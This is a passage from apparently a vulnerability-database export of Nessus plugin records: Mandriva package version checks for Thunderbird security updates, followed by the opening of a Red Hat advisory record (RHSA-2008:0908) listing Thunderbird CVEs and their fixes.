value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-gu_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-moztraybiff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-nb_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-nn_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pa_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_PT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sv_SE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nsinstall\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-af-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-be-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-bg-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-ca-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-cs-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-da-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-de-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-devel-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-el-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-en_GB-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-ar-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-ca-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-cs-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-de-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-el-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-es-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-es_AR-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-fi-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-fr-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-hu-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-it-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-ja-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-ko-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-nb-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-nl-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-pl-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-pt-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-pt_BR-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-ro-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-ru-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-sk-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-sl-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-sv-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-tr-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-zh_CN-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-enigmail-zh_TW-2.0.0.17-1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-es_AR-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-es_ES-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-et_EE-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-eu-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-fi-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-fr-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-gu_IN-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-he-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-hu-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-it-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-ja-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-ko-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-lt-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-mk-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-moztraybiff-1.2.3-4.2mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-nb_NO-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-nl-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-nn_NO-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-pa_IN-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-pl-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-pt_BR-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-pt_PT-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-ru-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-sk-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-sl-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-sv_SE-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-tr-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-uk-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-zh_CN-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mozilla-thunderbird-zh_TW-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"nsinstall-2.0.0.17-1.1mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-af-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-be-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-bg-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-ca-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-cs-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-da-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-de-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-devel-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-el-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-en_GB-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-ar-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-ca-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-cs-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-de-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-el-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-es-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-es_AR-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-fi-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-fr-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-hu-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-it-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-ja-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-ko-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-nb-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-nl-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-pl-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-pt-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-pt_BR-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-ro-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-ru-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-sk-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-sl-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-sv-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-tr-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-zh_CN-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-enigmail-zh_TW-2.0.0.17-1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-es_AR-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-es_ES-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-et_EE-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-eu-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-fi-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-fr-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-gu_IN-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-he-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-hu-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-it-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-ja-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-ko-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-lt-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-mk-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-moztraybiff-1.2.3-4.2mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-nb_NO-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-nl-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-nn_NO-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-pa_IN-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-pl-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-pt_BR-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-pt_PT-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-ru-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-sk-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-sl-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-sv_SE-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-tr-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-uk-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-zh_CN-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"mozilla-thunderbird-zh_TW-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"nsinstall-2.0.0.17-1.1mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:37:06", "references": ["https://www.redhat.com/security/data/cve/CVE-2008-4065.html", "https://www.redhat.com/security/data/cve/CVE-2008-4066.html", "https://www.redhat.com/security/data/cve/CVE-2008-3835.html", "https://www.redhat.com/security/data/cve/CVE-2008-0016.html", "http://rhn.redhat.com/errata/RHSA-2008-0908.html", "https://www.redhat.com/security/data/cve/CVE-2008-4058.html", "https://www.redhat.com/security/data/cve/CVE-2008-4059.html", "https://www.redhat.com/security/data/cve/CVE-2008-4061.html", "https://www.redhat.com/security/data/cve/CVE-2008-4062.html", "https://www.redhat.com/security/data/cve/CVE-2008-4070.html", "https://www.redhat.com/security/data/cve/CVE-2008-4067.html", "https://www.redhat.com/security/data/cve/CVE-2008-4060.html", "https://www.redhat.com/security/data/cve/CVE-2008-4068.html"], "pluginID": "34330", "description": "Updated thunderbird packages that fix several security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code as the user running Thunderbird. (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed HTML mail content was displayed. An HTML mail message containing specially crafted content could potentially trick a Thunderbird user into surrendering sensitive information. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068)\n\nA flaw was found in Thunderbird that caused certain characters to be stripped from JavaScript code. This flaw could allow malicious JavaScript to bypass or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nNote: JavaScript support is disabled by default in Thunderbird; the above issue is not exploitable unless JavaScript is enabled.\n\nA heap based buffer overflow flaw was found in the handling of cancelled newsgroup messages. If the user cancels a specially crafted newsgroup message it could cause Thunderbird to crash or, potentially, execute arbitrary code as the user running Thunderbird.\n(CVE-2008-4070)\n\nAll Thunderbird users should upgrade to these updated packages, which resolve these issues.", "edition": 6, "reporter": "Tenable", "published": "2008-10-02T00:00:00", "title": "RHEL 4 / 5 : thunderbird (RHSA-2008:0908)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-08-13T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:thunderbird", "cpe:/o:redhat:enterprise_linux:5.2", "cpe:/o:redhat:enterprise_linux:4.7"], "id": "REDHAT-RHSA-2008-0908.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34330", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0908. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34330);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", 